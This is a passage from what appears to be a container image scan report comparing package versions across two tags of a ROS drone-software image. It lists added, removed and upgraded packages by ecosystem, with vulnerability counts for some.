➕	ros-jazzy-rosidl-generator-c		4.6.7-1noble.20260122.003150
➕	ros-jazzy-rosidl-generator-cpp		4.6.7-1noble.20260122.063501
➕	ros-jazzy-rosidl-generator-py		0.22.2-1noble.20260123.035536
➕	ros-jazzy-rosidl-generator-type-description		4.6.7-1noble.20260122.001042
➕	ros-jazzy-rosidl-parser		4.6.7-1noble.20260122.000242
➕	ros-jazzy-rosidl-pycommon		4.6.7-1noble.20260122.001042
➕	ros-jazzy-rosidl-runtime-c		4.6.7-1noble.20260122.001437
➕	ros-jazzy-rosidl-runtime-cpp		4.6.7-1noble.20260122.003915
➕	ros-jazzy-rosidl-runtime-py		0.13.1-2noble.20260122.001040
➕	ros-jazzy-rosidl-typesupport-c		3.2.2-1noble.20260122.065032
➕	ros-jazzy-rosidl-typesupport-cpp		3.2.2-1noble.20260122.070301
➕	ros-jazzy-rosidl-typesupport-fastrtps-c		3.6.3-1noble.20260122.071138
➕	ros-jazzy-rosidl-typesupport-fastrtps-cpp		3.6.3-1noble.20260122.070620
➕	ros-jazzy-rosidl-typesupport-interface		4.6.7-1noble.20260122.000854
➕	ros-jazzy-rosidl-typesupport-introspection-c		4.6.7-1noble.20260122.003906
➕	ros-jazzy-rosidl-typesupport-introspection-cpp		4.6.7-1noble.20260122.065704
➕	ros-jazzy-rpyutils		0.4.2-1noble.20260121.183818
➕	ros-jazzy-rqt-action		2.2.1-1noble.20260124.110707
➕	ros-jazzy-rqt-bag		1.5.6-1noble.20260125.205345
➕	ros-jazzy-rqt-bag-plugins		1.5.6-1noble.20260125.210240
➕	ros-jazzy-rqt-common-plugins		1.2.0-4noble.20260125.210853
➕	ros-jazzy-rqt-console		2.2.2-1noble.20260124.105341
➕	ros-jazzy-rqt-graph		1.5.6-1noble.20260124.105409
➕	ros-jazzy-rqt-gui		1.6.3-1noble.20260124.102321
➕	ros-jazzy-rqt-gui-cpp		1.6.3-1noble.20260124.223002
➕	ros-jazzy-rqt-gui-py		1.6.3-1noble.20260124.104502
➕	ros-jazzy-rqt-image-view		1.3.0-2noble.20260124.223807
➕	ros-jazzy-rqt-msg		1.5.2-1noble.20260124.110037
➕	ros-jazzy-rqt-plot		1.4.5-1noble.20260124.105424
➕	ros-jazzy-rqt-publisher		1.7.3-1noble.20260124.105438
➕	ros-jazzy-rqt-py-common		1.6.3-1noble.20260124.102327
➕	ros-jazzy-rqt-py-console		1.2.3-1noble.20260124.110042
➕	ros-jazzy-rqt-reconfigure		1.6.3-1noble.20260124.110042
➕	ros-jazzy-rqt-service-caller		1.2.2-1noble.20260124.110037
➕	ros-jazzy-rqt-shell		1.2.3-1noble.20260124.110035
➕	ros-jazzy-rqt-srv		1.2.3-1noble.20260124.110708
➕	ros-jazzy-rqt-topic		1.7.5-1noble.20260124.105328
➕	ros-jazzy-rttest		0.17.1-3noble.20260122.000927
➕	ros-jazzy-rviz-assimp-vendor		14.1.19-1noble.20260122.001040
➕	ros-jazzy-rviz-common		14.1.19-1noble.20260124.192829
➕	ros-jazzy-rviz-default-plugins		14.1.19-1noble.20260125.002341
➕	ros-jazzy-rviz-ogre-vendor		14.1.19-1noble.20260122.001121
➕	ros-jazzy-rviz-rendering		14.1.19-1noble.20260122.004216
➕	ros-jazzy-rviz2		14.1.19-1noble.20260125.014906
➕	ros-jazzy-sdl2-vendor		3.3.0-3noble.20260122.001114
➕	ros-jazzy-sensor-msgs		5.3.6-1noble.20260124.135500
➕	ros-jazzy-sensor-msgs-py		5.3.6-1noble.20260124.150731
➕	ros-jazzy-service-msgs		2.0.3-1noble.20260123.075321
➕	ros-jazzy-shape-msgs		5.3.6-1noble.20260124.135511
➕	ros-jazzy-spdlog-vendor		1.6.1-1noble.20260122.001945
➕	ros-jazzy-sqlite3-vendor		0.26.9-1noble.20260125.195641
➕	ros-jazzy-sros2		0.13.5-1noble.20260124.104332
➕	ros-jazzy-sros2-cmake		0.13.5-1noble.20260124.104921
➕	ros-jazzy-statistics-msgs		2.0.3-1noble.20260124.093016
➕	ros-jazzy-std-msgs		5.3.6-1noble.20260124.093035
➕	ros-jazzy-std-srvs		5.3.6-1noble.20260124.093037
➕	ros-jazzy-stereo-msgs		5.3.6-1noble.20260124.150757
➕	ros-jazzy-tango-icons-vendor		0.3.1-1noble.20260123.050814
➕	ros-jazzy-teleop-twist-joy		2.6.5-1noble.20260124.184554
➕	ros-jazzy-teleop-twist-keyboard		2.4.1-1noble.20260124.120625
➕	ros-jazzy-tf2		0.36.19-1noble.20260124.142027
➕	ros-jazzy-tf2-bullet		0.36.19-1noble.20260124.193614
➕	ros-jazzy-tf2-eigen		0.36.19-1noble.20260124.193711
➕	ros-jazzy-tf2-eigen-kdl		0.36.19-1noble.20260124.150947
➕	ros-jazzy-tf2-geometry-msgs		0.36.19-1noble.20260124.193746
➕	ros-jazzy-tf2-kdl		0.36.19-1noble.20260124.193803
➕	ros-jazzy-tf2-msgs		0.36.19-1noble.20260124.142031
➕	ros-jazzy-tf2-py		0.36.19-1noble.20260124.144501
➕	ros-jazzy-tf2-ros		0.36.19-1noble.20260124.190752
➕	ros-jazzy-tf2-ros-py		0.36.19-1noble.20260124.145044
➕	ros-jazzy-tf2-sensor-msgs		0.36.19-1noble.20260124.193821
➕	ros-jazzy-tf2-tools		0.36.19-1noble.20260124.145820
➕	ros-jazzy-tinyxml2-vendor		0.9.2-1noble.20260122.075127
➕	ros-jazzy-tlsf		0.9.0-3noble.20260122.152551
➕	ros-jazzy-tlsf-cpp		0.17.1-3noble.20260124.223549
➕	ros-jazzy-topic-monitor		0.33.9-1noble.20260124.095308
➕	ros-jazzy-tracetools		8.2.5-1noble.20260123.022058
➕	ros-jazzy-trajectory-msgs		5.3.6-1noble.20260124.151025
➕	ros-jazzy-turtlesim		1.8.3-1noble.20260124.213634
➕	ros-jazzy-type-description-interfaces		2.0.3-1noble.20260124.013603
➕	ros-jazzy-uncrustify-vendor		3.0.1-1noble.20260122.152831
➕	ros-jazzy-unique-identifier-msgs		2.5.0-3noble.20260123.070345
➕	ros-jazzy-urdf		2.10.0-3noble.20260122.151955
➕	ros-jazzy-urdf-parser-plugin		2.10.0-3noble.20260121.214643
➕	ros-jazzy-urdfdom		4.0.2-1noble.20260122.100338
➕	ros-jazzy-urdfdom-headers		1.1.2-1noble.20260121.190747
➕	ros-jazzy-visualization-msgs		5.3.6-1noble.20260124.150918
➕	ros-jazzy-yaml-cpp-vendor		9.0.1-1noble.20260122.153708
➕	ros-jazzy-zstd-vendor		0.26.9-1noble.20260125.195603
♾️	ros2-apt-source	1.1.0~jammy	1.1.0~noble
♾️	rpcsvc-proto	1.4.2-0ubuntu6	1.4.2-0ubuntu7
♾️	ruby	1:3.0~exp1	1:3.2~ubuntu1
♾️	ruby-net-telnet	0.1.1-2	0.2.0-1
♾️	ruby-rubygems	3.3.5-2ubuntu1.2	3.4.20-1
➕	ruby-sdbm		1.0.0-5build4
♾️	ruby-webrick	1.7.0-3ubuntu0.2	1.8.1-1ubuntu0.2
♾️	ruby-xmlrpc	0.3.2-1ubuntu0.1	0.3.2-2
➖	ruby3.0	3.0.2-7ubuntu2.11
➕	ruby3.2		3.2.3-1ubuntu0.24.04.6
♾️	screen	4.9.0-1	4.9.1-1ubuntu1
		Removed vulnerabilities (4):
♾️	sdformat14-sdf	14.8.0-1~jammy	14.9.0-1~noble
♾️	sed	4.8-1ubuntu2	4.9-2build1
♾️	sensible-utils	0.0.17	0.0.22
♾️	session-migration	0.3.6	0.3.9build1
♾️	sgml-base	1.30	1.31
♾️	shared-mime-info	2.1-2	2.4-4
♾️	shiboken2	5.15.2-2build2	5.15.13-1
♾️	sip-dev	4.19.25+dfsg-3build1	4.19.25+dfsg-5build3
♾️	software-properties-common	0.99.22.9	0.99.49.3
➕	subversion		1.14.3-1build4
♾️	sudo	1.9.9-1ubuntu2.5	1.9.15p5-3ubuntu5.24.04.1
♾️	systemd	249.11-0ubuntu3.17	255.4-1ubuntu8.12
➕	systemd-dev		255.4-1ubuntu8.12
♾️	systemd-sysv	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	sysvinit-utils	3.01-1ubuntu1	3.08-6ubuntu3
♾️	tango-icon-theme	0.8.90-8	0.8.90-11
♾️	tar	1.34+dfsg-1ubuntu0.1.22.04.2	1.35+dfsg-3build1
♾️	tcl	8.6.11+1build2	8.6.14build1
♾️	tcl-dev	8.6.11+1build2	8.6.14build1
♾️	tcl8.6	8.6.12+dfsg-1build1	8.6.14+dfsg-1build1
♾️	tcl8.6-dev	8.6.12+dfsg-1build1	8.6.14+dfsg-1build1
♾️	tk	8.6.11+1build2	8.6.14build1
♾️	tk-dev	8.6.11+1build2	8.6.14build1
♾️	tk8.6	8.6.12-1build1	8.6.14-1build1
♾️	tk8.6-blt2.5	2.5.3+dfsg-4.1build2	2.5.3+dfsg-7build1
♾️	tk8.6-dev	8.6.12-1build1	8.6.14-1build1
♾️	tzdata	2025b-0ubuntu0.22.04.1	2025b-0ubuntu0.24.04.1
♾️	ubuntu-keyring	2021.03.26	2023.11.28.1
♾️	ubuntu-mono	20.10-0ubuntu2	24.04-0ubuntu1
♾️	ucf	3.0043	3.0043+nmu1
♾️	udev	249.11-0ubuntu3.17	255.4-1ubuntu8.12
♾️	uncrustify	0.72.0+dfsg1-2	0.78.1+dfsg1-1
♾️	unicode-data	14.0.0-1.1	15.1.0-1
♾️	unixodbc-common	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
♾️	unixodbc-dev	2.3.9-5ubuntu0.1	2.3.12-1ubuntu0.24.04.1
➕	unminimize		0.2.1
➖	usrmerge	25ubuntu2
♾️	util-linux	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	uuid-dev	2.37.2-4ubuntu3.4	2.39.3-9ubuntu6.4
♾️	valgrind	1:3.18.1-1ubuntu2	1:3.22.0-0ubuntu3
♾️	vtk9	9.1.0+really9.1.0+dfsg2-3build1	9.1.0+really9.1.0+dfsg2-7.1build3
➕	wayland-protocols		1.45-1~ubuntu0.24.04.1
♾️	wget	1.21.2-2ubuntu1.1	1.21.4-1ubuntu4.1
➕	wx-common		3.2.4+dfsg-4build1
➕	wx3.2-headers		3.2.4+dfsg-4build1
♾️	x11-common	1:7.7+23ubuntu2	1:7.7+23ubuntu3
♾️	x11-xkb-utils	7.7+5build4	7.7+8build2
♾️	x11-xserver-utils	7.7+9build1	7.7+10build2
♾️	x11proto-dev	2021.5-1	2023.2-1
♾️	xauth	1:1.1-1build2	1:1.1.2-1build1
♾️	xbitmaps	1.1.1-2.1ubuntu1	1.1.1-2.2
♾️	xfonts-base	1:1.0.5	1:1.0.5+nmu1
♾️	xfonts-utils	1:7.7+6build2	1:7.7+6build3
♾️	xkb-data	2.33-1	2.41-2ubuntu1.1
♾️	xml-core	0.18+nmu1	0.19
♾️	xpra	3.1-1build5	3.1.5+dfsg1-0.2ubuntu1
♾️	xserver-common	2:21.1.4-2ubuntu1.7~22.04.16	2:21.1.12-1ubuntu1.5
♾️	xserver-xorg-core	2:21.1.4-2ubuntu1.7~22.04.16	2:21.1.12-1ubuntu1.5
♾️	xserver-xorg-video-dummy	1:0.3.8-2build1	1:0.4.0-1build1
♾️	xterm	372-1ubuntu1	390-1ubuntu3
♾️	xvfb	2:21.1.4-2ubuntu1.7~22.04.16	2:21.1.12-1ubuntu1.5
♾️	xz-utils	5.2.5-2ubuntu1	5.6.1+really5.4.5-1ubuntu0.2
♾️	zlib1g	1:1.2.11.dfsg-2ubuntu9.2	1:1.3.dfsg-3.1ubuntu2.1
♾️	zlib1g-dev	1:1.2.11.dfsg-2ubuntu9.2	1:1.3.dfsg-3.1ubuntu2.1

Changes for packages of type gem (86 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	abbrev	0.1.0	0.1.1
♾️	base64	0.1.0	0.1.1
♾️	benchmark	0.1.1	0.2.1
♾️	bigdecimal	3.0.0	3.1.3
♾️	bundler	2.2.22	2.4.19
		Removed vulnerabilities (1):
♾️	cgi	0.2.0	0.3.6
		Removed vulnerabilities (3):
♾️	csv	3.1.9	3.2.6
♾️	date	3.1.0	3.3.3
		Removed vulnerabilities (1):
➖	dbm	1.1.0
♾️	debug	0.1.0	1.7.1
♾️	delegate	0.2.0	0.3.0
♾️	did_you_mean	1.5.0	1.6.3
♾️	digest	3.0.0	3.1.1
♾️	drb	2.0.4	2.1.1
♾️	english	0.7.1	0.7.2
♾️	erb	2.2.0	4.0.2
➕	error_highlight		0.5.1
♾️	etc	1.2.0	1.4.2
♾️	fcntl	1.0.0	1.0.2
♾️	fiddle	1.0.6	1.1.1
♾️	fileutils	1.5.0	1.7.0
♾️	find	0.1.0	0.1.1
♾️	forwardable	1.3.2	1.3.3
➖	gdbm	2.1.0
♾️	getoptlong	0.1.1	0.2.0
♾️	io-console	0.5.7	0.6.0
♾️	io-nonblock	0.1.0	0.2.0
♾️	io-wait	0.1.0	0.3.0
♾️	ipaddr	1.2.2	1.2.5
♾️	irb	1.3.5	1.6.2
♾️	json	2.5.1	2.6.3
♾️	logger	1.4.3	1.5.3
♾️	matrix	0.3.1	0.4.2
♾️	minitest	5.14.2	5.16.3
♾️	mutex_m	0.1.1	0.1.2
♾️	net-ftp	0.1.2	0.2.1
♾️	net-http	0.1.1	0.4.1
♾️	net-imap	0.1.1	0.3.4.1
			Added vulnerabilities (1):
♾️	net-pop	0.1.1	0.1.2
♾️	net-protocol	0.1.0	0.2.1
♾️	net-smtp	0.2.1	0.3.4
♾️	net-telnet	0.1.1	0.2.0
♾️	nkf	0.1.0	0.1.2
♾️	open-uri	0.1.0	0.3.0
♾️	open3	0.1.1	0.1.2
♾️	openssl	3.0.0	3.1.0
♾️	optparse	0.1.0	0.3.1
♾️	ostruct	0.3.1	0.5.5
♾️	pathname	0.1.0	0.2.1
♾️	power_assert	1.2.0	2.0.3
♾️	pp	0.1.0	0.4.0
♾️	prettyprint	0.1.0	0.1.1
♾️	pstore	0.1.1	0.1.2
♾️	psych	3.3.0	5.0.1
♾️	racc	1.5.1	1.6.2
♾️	rbs	1.0.4	2.8.2
♾️	rdoc	6.3.1	6.5.0
			Added vulnerabilities (1):
♾️	readline	0.0.2	0.0.3
♾️	readline-ext	0.1.1	0.1.5
♾️	reline	0.2.5	0.3.2
♾️	resolv	0.2.0	0.2.2
♾️	resolv-replace	0.1.0	0.1.1
♾️	rinda	0.1.0	0.1.1
➕	ruby2_keywords		0.0.5
♾️	rubygems-update	3.3.5	3.4.20
➕	sdbm		1.0.0
♾️	securerandom	0.1.0	0.2.2
♾️	set	1.0.1	1.0.3
♾️	stringio	3.0.0	3.0.4
		Removed vulnerabilities (1):
♾️	strscan	3.0.0	3.0.5
➕	syntax_suggest		1.1.0
♾️	syslog	0.1.0	0.1.1
♾️	tempfile	0.1.1	0.1.3
♾️	test-unit	3.3.7	3.5.7
♾️	time	0.1.0	0.2.2
		Removed vulnerabilities (1):
♾️	timeout	0.1.1	0.3.1
♾️	tmpdir	0.1.2	0.1.3
➖	tracer	0.1.1
♾️	tsort	0.1.0	0.1.1
♾️	typeprof	0.12.0	0.21.3
♾️	un	0.1.0	0.2.1
♾️	uri	0.10.1	0.12.2
		Removed vulnerabilities (2):
♾️	weakref	0.1.1	0.1.2
♾️	webrick	1.7.0	1.8.1
♾️	yaml	0.1.1	0.2.1
♾️	zlib	1.1.0	3.0.0

Changes for packages of type generic (1 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
➕	ffmpeg		5.1.6

Changes for packages of type maven (1 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	jrt-fs/jrt-fs	11.0.29	21.0.10

Changes for packages of type pypi (243 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
♾️	action-msgs	1.2.2	2.0.3
♾️	action-tutorials-interfaces	0.20.7	0.33.9
♾️	action-tutorials-py	0.20.7	0.33.9
♾️	actionlib-msgs	4.9.0	5.3.6
♾️	ament-cmake-test	1.3.12	2.5.5
♾️	ament-copyright	0.12.14	0.17.4
♾️	ament-cppcheck	0.12.14	0.17.4
♾️	ament-cpplint	0.12.14	0.17.4
♾️	ament-flake8	0.12.14	0.17.4
♾️	ament-index-python	1.4.0	1.8.2
♾️	ament-lint	0.12.14	0.17.4
♾️	ament-lint-cmake	0.12.14	0.17.4
♾️	ament-package	0.14.1	0.16.5
♾️	ament-pep257	0.12.14	0.17.4
♾️	ament-uncrustify	0.12.14	0.17.4
♾️	ament-xmllint	0.12.14	0.17.4
♾️	angles	1.15.0	1.16.1
➖	apipkg	1.5
♾️	argcomplete	1.8.1	3.1.4
➕	attrdict3		2.0.2
♾️	attrs	21.2.0	23.2.0
➖	babel	2.8.0
		Removed vulnerabilities (1):
➖	beniget	0.4.1
♾️	blinker	1.4	1.7.0
➕	breezy		3.3.5
♾️	brotli	1.0.9	1.1.0
♾️	builtin-interfaces	1.2.2	2.0.3
♾️	certifi	2025.11.12	2026.2.25
♾️	colorama	0.4.4	0.4.6
♾️	composition-interfaces	1.2.2	2.0.3
➕	configobj		5.0.8
			Added vulnerabilities (1):
➕	contourpy		1.0.7
♾️	cryptography	3.4.8	41.0.7
		Removed vulnerabilities (6):	Added vulnerabilities (2):
♾️	cv-bridge	3.2.1	4.1.0
♾️	dbus-python	1.2.18	1.3.2
♾️	decorator	4.4.2	5.1.1
♾️	demo-nodes-py	0.20.7	0.33.9
➕	deprecated		1.2.14
♾️	diagnostic-msgs	4.9.0	5.3.6
♾️	diagnostic-updater	4.0.6	4.2.6
♾️	distlib	0.3.4	0.3.8
♾️	distro	1.7.0	1.9.0
♾️	docutils	0.17.1	0.20.1
♾️	domain-coordinator	0.10.0	0.12.0
➕	dulwich		0.21.6
♾️	example-interfaces	0.9.3	0.12.0
♾️	examples-rclpy-executors	0.15.5	0.19.7
♾️	examples-rclpy-minimal-action-client	0.15.5	0.19.7
♾️	examples-rclpy-minimal-action-server	0.15.5	0.19.7
♾️	examples-rclpy-minimal-client	0.15.5	0.19.7
♾️	examples-rclpy-minimal-publisher	0.15.5	0.19.7
♾️	examples-rclpy-minimal-service	0.15.5	0.19.7
♾️	examples-rclpy-minimal-subscriber	0.15.5	0.19.7
➕	fastbencode		0.2
♾️	fastcrc	0.3.4	0.3.5
➕	flake8-builtins		2.1.0
➕	flake8-comprehensions		3.14.0
➕	flake8-docstrings		1.6.0
➕	flake8-import-order		0.18.2
➕	flake8-quotes		3.4.0
♾️	fonttools	4.29.1	4.46.0
		Removed vulnerabilities (1):	Added vulnerabilities (1):
♾️	fs	2.4.12	2.4.16
➖	gast	0.5.2
♾️	gcovr	5.0	7.0
♾️	geometry-msgs	4.9.0	5.3.6
♾️	httplib2	0.20.2	0.20.4
♾️	image-geometry	3.2.1	4.1.0
♾️	importlib-metadata	8.0.0	8.7.1
➖	inflect	7.3.1
♾️	interactive-markers	2.3.2	2.5.5
➖	jaraco-collections	5.1.0
♾️	jaraco-context	5.3.0	6.1.0
♾️	jaraco-functools	4.0.1	4.4.0
♾️	jaraco-text	3.12.1	4.0.0
➖	jeepney	0.7.1
♾️	jinja2	3.0.3	3.1.2
➖	keyring	23.5.0
♾️	kiwisolver	1.3.2	1.4.9
♾️	lark	1.1.1	1.1.9
♾️	laser-geometry	2.4.1	2.7.2
♾️	launch	1.0.13	3.4.10
♾️	launch-ros	0.19.13	0.26.11
♾️	launch-testing	1.0.13	3.4.10
♾️	launch-testing-ros	0.19.13	0.26.11
♾️	launch-xml	1.0.13	3.4.10
♾️	launch-yaml	1.0.13	3.4.10
♾️	launchpadlib	1.10.16	1.11.0
♾️	lazr-restfulclient	0.14.4	0.14.6
♾️	lifecycle-msgs	1.2.2	2.0.3
♾️	logging-demo	0.20.7	0.33.9
♾️	lz4	3.1.3+dfsg	4.0.2+dfsg
♾️	map-msgs	2.1.0	2.4.1
♾️	markupsafe	2.0.1	2.1.5
♾️	matplotlib	3.5.1	3.6.3
♾️	mavros	2.12.0	2.14.0
♾️	mavros-msgs	2.12.0	2.14.0
➕	mercurial		6.7.2
➕	merge3		0.0.8
♾️	message-filters	4.3.11	4.11.9
♾️	more-itertools	8.10.0	10.8.0
♾️	mpi4py	3.1.3	3.1.5
➖	my-test-package	1.0
♾️	nav-msgs	4.9.0	5.3.6
➖	netifaces	0.11.0
♾️	numpy	1.21.5	2.4.2
		Removed vulnerabilities (1):
♾️	oauthlib	3.2.0	3.2.2
		Removed vulnerabilities (1):
➕	opencv-python		4.13.0.92
♾️	osrf-pycommon	2.1.6	2.1.7
♾️	packaging	25.0	26.0
➕	patiencediff		0.2.13
♾️	pendulum-msgs	0.20.7	0.33.9
♾️	pexpect	4.8.0	4.9.0
♾️	pillow	9.0.1	10.2.0
		Removed vulnerabilities (6):
♾️	pip	25.3	26.0.1
		Removed vulnerabilities (1):
♾️	platformdirs	4.2.2	4.4.0
♾️	pluggy	0.13.0	1.4.0
➖	ply	3.11
♾️	protobuf	3.12.4	4.21.12
		Removed vulnerabilities (2):
♾️	psutil	5.9.0	7.2.2
➖	py	1.10.0
♾️	pybind11	2.9.1	2.11.1
♾️	pycairo	1.20.1	1.25.1
♾️	pycodestyle	2.8.0	2.14.0
♾️	pydocstyle	6.1.1	6.3.0
♾️	pygments	2.11.2	2.17.2
		Removed vulnerabilities (1):
♾️	pygobject	3.42.1	3.48.2
♾️	pyjwt	2.3.0	2.7.0
		Removed vulnerabilities (1):
♾️	pynmeagps	1.0.56	1.1.2
♾️	pyparsing	2.4.7	3.3.2
♾️	pyqt5	5.15.6	5.15.10
♾️	pyqt5-sip	12.9.1	12.13.0
♾️	pytest	6.2.5	7.4.4
♾️	python-apt	2.4.0+ubuntu4.1	2.7.7+ubuntu5.2
♾️	python-dateutil	2.8.1	2.8.2
♾️	python-qt-binding	1.1.3	2.2.2
➖	pythran	0.10.0
♾️	pytz	2022.1	2024.1
♾️	pyyaml	5.4.1	6.0.3
♾️	qt-dotgraph	2.2.4	2.7.5
♾️	qt-gui	2.2.4	2.7.5
♾️	qt-gui-cpp	2.2.4	2.7.5
♾️	qt-gui-py-common	2.2.4	2.7.5
♾️	quality-of-service-demo-py	0.20.7	0.33.9
♾️	rcl-interfaces	1.2.2	2.0.3
♾️	rclpy	3.3.19	7.1.9
♾️	rcutils	5.1.7	6.7.5
♾️	resource-retriever	3.1.3	3.4.4
♾️	rmw-dds-common	1.6.0	3.1.1
♾️	ros2action	0.18.15	0.32.8
♾️	ros2bag	0.15.15	0.26.9
➕	ros2bag-mcap-cli		0.26.9
➕	ros2bag-sqlite3-cli		0.26.9
♾️	ros2cli	0.18.15	0.32.8
♾️	ros2component	0.18.15	0.32.8
♾️	ros2doctor	0.18.15	0.32.8
♾️	ros2interface	0.18.15	0.32.8
♾️	ros2launch	0.19.13	0.26.11
♾️	ros2lifecycle	0.18.15	0.32.8
♾️	ros2multicast	0.18.15	0.32.8
♾️	ros2node	0.18.15	0.32.8
♾️	ros2param	0.18.15	0.32.8
♾️	ros2pkg	0.18.15	0.32.8
➕	ros2plugin		5.4.4
♾️	ros2run	0.18.15	0.32.8
♾️	ros2service	0.18.15	0.32.8
♾️	ros2topic	0.18.15	0.32.8
♾️	rosbag2-interfaces	0.15.15	0.26.9
♾️	rosbag2-py	0.15.15	0.26.9
♾️	rosgraph-msgs	1.2.2	2.0.3
♾️	rosidl-adapter	3.1.7	4.6.7
♾️	rosidl-cli	3.1.7	4.6.7
♾️	rosidl-cmake	3.1.7	4.6.7
♾️	rosidl-generator-c	3.1.7	4.6.7
♾️	rosidl-generator-cpp	3.1.7	4.6.7
♾️	rosidl-generator-py	0.14.6	0.22.2
➕	rosidl-generator-type-description		4.6.7
♾️	rosidl-parser	3.1.7	4.6.7
➕	rosidl-pycommon		4.6.7
♾️	rosidl-runtime-py	0.9.3	0.13.1
♾️	rosidl-typesupport-c	2.0.2	3.2.2
♾️	rosidl-typesupport-cpp	2.0.2	3.2.2
♾️	rosidl-typesupport-fastrtps-c	2.2.3	3.6.3
♾️	rosidl-typesupport-fastrtps-cpp	2.2.3	3.6.3
♾️	rosidl-typesupport-introspection-c	3.1.7	4.6.7
♾️	rosidl-typesupport-introspection-cpp	3.1.7	4.6.7
♾️	rospkg-modules	1.6.0	1.6.1
♾️	rpyutils	0.2.2	0.4.2
♾️	rqt-action	2.0.1	2.2.1
♾️	rqt-bag	1.1.5	1.5.6
♾️	rqt-bag-plugins	1.1.5	1.5.6
♾️	rqt-console	2.0.3	2.2.2
♾️	rqt-graph	1.3.1	1.5.6
♾️	rqt-gui	1.1.9	1.6.3
♾️	rqt-gui-py	1.1.9	1.6.3
♾️	rqt-msg	1.2.0	1.5.2
♾️	rqt-plot	1.1.5	1.4.5
♾️	rqt-publisher	1.5.0	1.7.3
♾️	rqt-py-common	1.1.9	1.6.3
♾️	rqt-py-console	1.0.2	1.2.3
♾️	rqt-reconfigure	1.1.2	1.6.3
♾️	rqt-service-caller	1.0.5	1.2.2
♾️	rqt-shell	1.0.2	1.2.3
♾️	rqt-srv	1.0.3	1.2.3
♾️	rqt-topic	1.5.0	1.7.5
♾️	scipy	1.8.0	1.17.1
		Removed vulnerabilities (1):
➖	secretstorage	3.3.1
♾️	sensor-msgs	4.9.0	5.3.6
♾️	sensor-msgs-py	4.9.0	5.3.6
➕	service-msgs		2.0.3
♾️	setuptools	80.9.0	82.0.0
♾️	shape-msgs	4.9.0	5.3.6
♾️	sros2	0.10.7	0.13.5
♾️	statistics-msgs	1.2.2	2.0.3
♾️	std-msgs	4.9.0	5.3.6
♾️	std-srvs	4.9.0	5.3.6
♾️	stereo-msgs	4.9.0	5.3.6
♾️	sympy	1.9	1.12
♾️	tf2-geometry-msgs	0.25.17	0.36.19
♾️	tf2-kdl	0.25.17	0.36.19
♾️	tf2-msgs	0.25.17	0.36.19
♾️	tf2-py	0.25.17	0.36.19
♾️	tf2-ros-py	0.25.17	0.36.19
♾️	tf2-sensor-msgs	0.25.17	0.36.19
♾️	tf2-tools	0.25.17	0.36.19
➖	toml	0.10.2
♾️	tomli	2.0.1	2.4.0
♾️	topic-monitor	0.20.7	0.33.9
♾️	trajectory-msgs	4.9.0	5.3.6
♾️	turtlesim	1.4.3	1.8.3
➕	type-description-interfaces		2.0.3
➖	typeguard	4.3.0
➖	typing-extensions	4.12.2
➕	tzlocal		5.2
♾️	ufolib2	0.13.1	0.16.0
♾️	unicodedata2	14.0.0	15.1.0
♾️	unique-identifier-msgs	2.2.1	2.5.0
♾️	urllib3	2.6.2	2.0.7
			Added vulnerabilities (4):
♾️	visualization-msgs	4.9.0	5.3.6
♾️	wheel	0.45.1	0.46.3
		Removed vulnerabilities (1):
➕	wrapt		1.15.0
♾️	wxpython	4.0.7	4.2.5
♾️	xpra	3.1	3.1.5
♾️	zipp	3.19.2	3.23.0

Changes for packages of type rpm (14 changes)

	Package	Version ghcr.io/cuautodrone/cuad-ros:latest	Version ghcr.io/cuautodrone/cuad-ros:test
➕	libX11-xcb		1.6.8-9.el8_10
➕	libXau		1.0.9-3.el8
➕	libgfortran		8.5.0-28.el8_10.alma.1
➕	libxcb		1.13.1-1.el8
➕	libxkbcommon		0.9.1-1.el8
➕	libxkbcommon-x11		0.9.1-1.el8
➕	openblas-threads		0.3.15-6.el8
➕	openssl-libs		1.1.1k-14.el8_6
➕	pcre2-utf16		10.32-3.el8_6
➕	xcb-util		0.4.0-10.el8
➕	xcb-util-image		0.4.0-9.el8
➕	xcb-util-keysyms		0.4.0-7.el8
➕	xcb-util-renderutil		0.3.9-10.el8
➕	xcb-util-wm		0.4.1-12.el8